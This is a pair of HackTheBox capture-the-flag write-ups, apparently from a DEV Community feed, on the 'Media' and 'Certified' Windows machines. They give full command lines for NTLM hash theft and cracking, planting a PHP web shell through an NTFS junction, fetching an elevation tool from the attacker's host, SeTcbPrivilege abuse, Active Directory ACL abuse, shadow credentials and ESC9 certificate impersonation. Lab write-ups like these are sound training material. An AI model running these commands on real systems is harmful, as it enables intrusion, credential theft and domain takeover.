DEV Community: Mohamed Mo

HackTheBox Media writeup

Mohamed Mo — Tue, 10 Feb 2026 15:56:33 +0000

Back with a new writeup

Overview:
Media is a Medium-difficulty Windows machine from HackTheBox (VulnLab) running an Apache XAMPP stack with a custom PHP web application. The file upload functionality can be abused to leak an NTLMv2 hash, which can be cracked to obtain credentials and gain initial access via SSH.

Afterward, analyzing the application’s source code reveals the upload storage path, enabling an NTFS Junction attack to upload a malicious PHP web shell and achieve RCE. Finally, privilege escalation is achieved by abusing SeTcbPrivilege or regaining SeImpersonate to elevate privileges to NT AUTHORITY\SYSTEM.

Enumeration

RustScan-Nmap

Let’s start the enumeration:

Enum Http/80

I started by enumerating web page

As mentioned in the photo above we can upload video files, so I figured that it might be ntlm relay attack, then I used ntlm_theft to generate malicious file with .asx extension

.asx – via Windows Media Player playlist (Better, primary open)

python3 tools/ntlm_theft.py -g asx -s 10.10.14.115 --filename shell

Next started responder to capture the hash

sudo responder -I tun0 -dwv

Then I uploaded the file

and suiii we did it.

Now we have ntlmv2 hash for enox,then let's running hashcat to crack the hash

hashcat -m 5600 ntlmv2 /usr/share/wordlists/rockyou.txt

Nice now we have user creds: enox:1234virus@ now we can try login using ssh or rdp

I managed to gain foothold using ssh and captured the user.txt flag

Lateral Movement

We can start with enumeration of the target and we can start with the webapp application directory source code to find any hard coded credentials that may be readable.

First, I reviewed index.php

<?php
error_reporting(0);

    // Your PHP code for handling form submission and file upload goes here.
    $uploadDir = 'C:/Windows/Tasks/Uploads/'; // Base upload directory

    if ($_SERVER["REQUEST_METHOD"] == "POST" && isset($_FILES["fileToUpload"])) {
        $firstname = filter_var($_POST["firstname"], FILTER_SANITIZE_STRING);
        $lastname = filter_var($_POST["lastname"], FILTER_SANITIZE_STRING);
        $email = filter_var($_POST["email"], FILTER_SANITIZE_STRING);

        // Create a folder name using the MD5 hash of Firstname + Lastname + Email
        $folderName = md5($firstname . $lastname . $email);

        // Create the full upload directory path
        $targetDir = $uploadDir . $folderName . '/';

        // Ensure the directory exists; create it if not
        if (!file_exists($targetDir)) {
            mkdir($targetDir, 0777, true);
        }

        // Sanitize the filename to remove unsafe characters
        $originalFilename = $_FILES["fileToUpload"]["name"];
        $sanitizedFilename = preg_replace("/[^a-zA-Z0-9._]/", "", $originalFilename);


        // Build the full path to the target file
        $targetFile = $targetDir . $sanitizedFilename;

        if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $targetFile)) {
            echo "<script>alert('Your application was successfully submitted. Our HR shall review your video and get back to you.');</script>";

            // Update the todo.txt file
            $todoFile = $uploadDir . 'todo.txt';
            $todoContent = "Filename: " . $originalFilename . ", Random Variable: " . $folderName . "\n";

            // Append the new line to the file
            file_put_contents($todoFile, $todoContent, FILE_APPEND);
        } else {
            echo "<script>alert('Uh oh, something went wrong... Please submit again');</script>";
        }
    }
    ?>

From the source code, we can extract two important details: the base upload directory and the logic used to generate the upload path. The application stores uploaded files under the following directory:

$uploadDir = 'C:/Windows/Tasks/Uploads/';
$folderName = md5($firstname . $lastname . $email);

This means that each user’s files are stored inside a folder whose name is derived from the MD5 hash of the concatenated first name, last name, and email address. By calculating this MD5 hash using the same inputs, we can predict the exact folder name and verify it against the directory where uploaded files are stored.

Arbitrary File Write to RCE via Junction

1) Upload Webshell

We can see f323599927054a9351e0927d6002b64b:

After removing the directory, let's make a link:

mklink /J C:\Windows\Tasks\Uploads\f323599927054a9351e0927d6002b64b C:\xampp\htdocs

Now I'll upload the webshell, Let's check If the link worked:

Now let's upload reverse shell using this webshell:

And It worked:

privilege escalation

After checking our privs we found SeTcbPrivilege:

SeTcbPrivilege

It is a Windows privilege that allows a process or user to operate as part of the OS.
With this privilege, a process can impersonate users, create tokens, and perform highly sensitive system-level actions.
It is one of the most powerful privileges in Windows and is rarely granted because it can lead to full system compromise if abused.

This privilege can be leveraged to achieve privilege escalation using the following technique https://github.com/b4lisong/SeTcbPrivilege-Abuse

I uploaded TcbElevation-x64.exe:

curl http://10.10.14.139:8000/TcbElevation-x64.exe -o TcbElevation-x64.exe

then let's add our user enox to the Administrators group

.\TcbElevation-x64.exe elevate "net localgroup Administrators enox /add"

Finally, we reconnect via SSH with elevated privileges to obtain the flag.

HackTheBox Certified writeup

Mohamed Mo — Thu, 05 Feb 2026 08:03:30 +0000

Yoo Guys craches is baaaack, Just pwned Certified which is a Windows Active Directory machine focuses on abusing ACL misconfigurations and ADCS vulnerabilities. Throughout the exploitation process, we leverage multiple techniques including ACL-based attacks, ADCS attacks, shadow credentials, and pass-the-certificate. These weaknesses allow us to progressively escalate privileges and move laterally within the domain until achieving full compromise.

Enumeration

RustScan-Nmap

Let’s start the enumeration:

It’s clear that ports 88, 389, 445, and 53 are open, which proves that we are dealing with a Domain Controller (DC).

Also the we can see that the FQDN dc01.certified.htb and the domain name certified.htb

Bloodhound

Now we can use the credentials provided in the machine to start bloodhound:

bloodhound-python -u judith.mader -p 'judith09' -d certified.htb -c all -ns 10.129.17

let’s start our bloodhound

BloodHound --no-sandbox

We can start by checking the Outbound permissions. After uploading the files we obtained, we mark our user judith.mader as an owned user and begin our enumeration.

we can notice that judith.mader has WriteOwner permission over the Management group. This means that judith.mader has the ability to modify the owner of the group,which can later be abused to gain additional privileges.

1-Let’s make judith.mader owner of Management group using impacket-owneredit:

impacket-owneredit -action write -new-owner 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09' -dc-ip 10.129.231.186

By doing this, judith.mader becomes the owner of the group object, which gives us the ability to modify its ACLs.

2-Granting WriteMembers Permission

After becoming the owner, we modified the DACL of the group to grant our user the WriteMembers permission using impacket-dacledit:

impacket-dacledit -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' 'certified.htb'/'judith.mader':'judith09' -dc-ip 10.129.231.186

This permission allows our user to add or remove members from the Management group.

3- Adding Our User to the Target Group

Finally, we added judith.mader to the Management group using bloodyAD:

bloodyAD --host "10.129.231.186" -d "certified.htb" -u "judith.mader" -p "judith09" add groupMember "MANAGEMENT" "judith.mader"

Now let’s see as Management group owner what can we do

Abusing GenericWrite Permission over a Service Account

It’s obvious that Management group has GenericWrite permission over the Management_svc,This is a critical finding because GenericWrite allows us to modify sensitive attributes of the target account, which can be abused for privilege escalation.

1-Performing a Shadow Credentials Attack

I decided to perform a shadow credentials attack by injecting a malicious key credential into the Management_svc account using pywhisker:

pywhisker.py -d "certified.htb" -u "judith.mader" -p "judith09" --target "management_svc" --action "add"

This attack modifies the msDS-KeyCredentialLink attribute of the target account, enabling certificate-based authentication.

2-Obtaining a Kerberos TGT via Pass-the-Certificate

With the generated certificate, we requested a Kerberos Ticket Granting Ticket (TGT) for the Management_svc account using gettgtpkinit.py:

python3 gettgtpkinit.py -cert-pfx tR7jS332.pfx -pfx-pass 'KAcWM00HwJLCAiklYcBJ' -dc-ip 10.129.172.148 certified.htb/management_svc management_svc.ccache\

This technique is known as pass-the-certificate, which allows us to authenticate as the service account without knowing its password.

Finally, we use the obtained TGT and export it to our environment in order to authenticate as the compromised service account.

Using the Kerberos Ticket to Access the Target System

USER.txt Flag

After exporting the Kerberos ticket, we configure Kerberos to use it by generating a proper krb5.conf file using nxc:

nxc smb 10.129.172.148 — generate-krb5-file krb5.conf

Next, we use the Kerberos authentication with evil-winrm to obtain a remote shell on the target machine:

evil-winrm -r certified.htb -i 10.129.172.148

Once we successfully authenticate, we gain access to the system and retrieve the user flag:

type C:\Users\management_svc\Desktop\user.txt

At this point, we have successfully leveraged the Kerberos ticket to obtain a shell and capture the user flag.

Lateral Movement

Let’s check Management_svc OUTBOUND OBJECT CONTROL using bloodhound:

We discovered that Management_svc has GenericAll permission over the ca_operator account. This is a powerful privilege that allows full control over the target account, including the ability to reset its password.

Resetting the Password of the Target Account

We exploited this permission by resetting the password of the ca_operator account using bloodyAD:

bloodyAD --host dc01.certified.htb -d certified.htb -u management_svc -k set password CA_OPERATOR 'MO@ha123'

Now we confirmed that ca_operator’s password has been successfully changed to MO@ha123

However, BloodHound did not reveal any meaningful privileges assigned to ca_operator. As a result, I moved on to enumerating vulnerable certificate templates using the ca_operator account.

Enumerating Vulnerable Certificate Templates

Using the ca_operator account, we enumerated the ADCS environment to identify vulnerable certificate templates by leveraging Certipy:

certipy-ad find -u 'CA_OPERATOR' -p MO@ha123 -dc-ip 10.129.172.148 -vulnerable -enabled

<SNIP>

    CA Name :     certified-DC01-CA

<SNIP>

Certificate Templates
    Template Name :    CertifiedAuthentication

<SNIP>

  Permissions
    Enrollment Permissions
      Enrollment Rights :   CERTIFIED.HTB\operator ca

<SNIP>

[!] Vulnerabilities
        ESC9      : 'CERTIFIED.HTB\\operator ca' can enroll
and template has no security extension

The results revealed an enabled certificate template named CertifiedAuthentication that is vulnerable to ESC9. This vulnerability exists because the template lacks security extensions, making it possible to abuse it for privilege escalation.

Exploiting the ESC9 Vulnerability

After confirming that the CertifiedAuthentication template is vulnerable to ESC9, we proceeded to exploit it to impersonate a privileged user.

1-Modifying the UPN of the ca_operator Account

First, we modified the User Principal Name (UPN) of the ca_operator
account to match the Administrator account. This is a crucial step in ESC9 exploitation, as it allows us to request a certificate that will be mapped to the Administrator account.

certipy-ad account update -user ca_operator -upn Administrator -dc-ip 10.129.231.186 -target dc01.certified.htb -k

2-Requesting a Certificate as Administrator

Next, we requested a certificate from the vulnerable template using the modified ca_operator account:

certipy-ad req -u ca_operator -p MO@ha123 -ca certified-DC01-CA -template CertifiedAuthentication -dc-ip 10.129.231.186

Because of the ESC9 misconfiguration, the issued certificate is effectively associated with the Administrator account.

3-Authenticating as Administrator (Pass-the-Certificate)

We then authenticate to the domain using the obtained certificate:

certipy-ad auth -pfx administrator.pfx -domain certified.htb

Certipy successfully retrieves the NTLM hash of the Administrator account:

[*] Got hash for ‘administrator@certified.htb’:<REDACTED>

4- Getting a Shell as Administrator

Finally, we use the NTLM hash to log in as Administrator and retrieve the root flag:

evil-winrm -i certified.htb -u Administrator -H <REDACTED>

After gaining access, we obtain the root flag from:

type C:\Users\Administrator\Desktop\root.txt

4- Getting a Shell as Administrator

Finally, we use the NTLM hash to log in as Administrator and retrieve the root flag:

evil-winrm -i certified.htb -u Administrator -H <REDACTED>

After gaining access, we obtain the root flag from:

type C:\Users\Administrator\Desktop\root.txt

At this point, we achieved full domain compromise.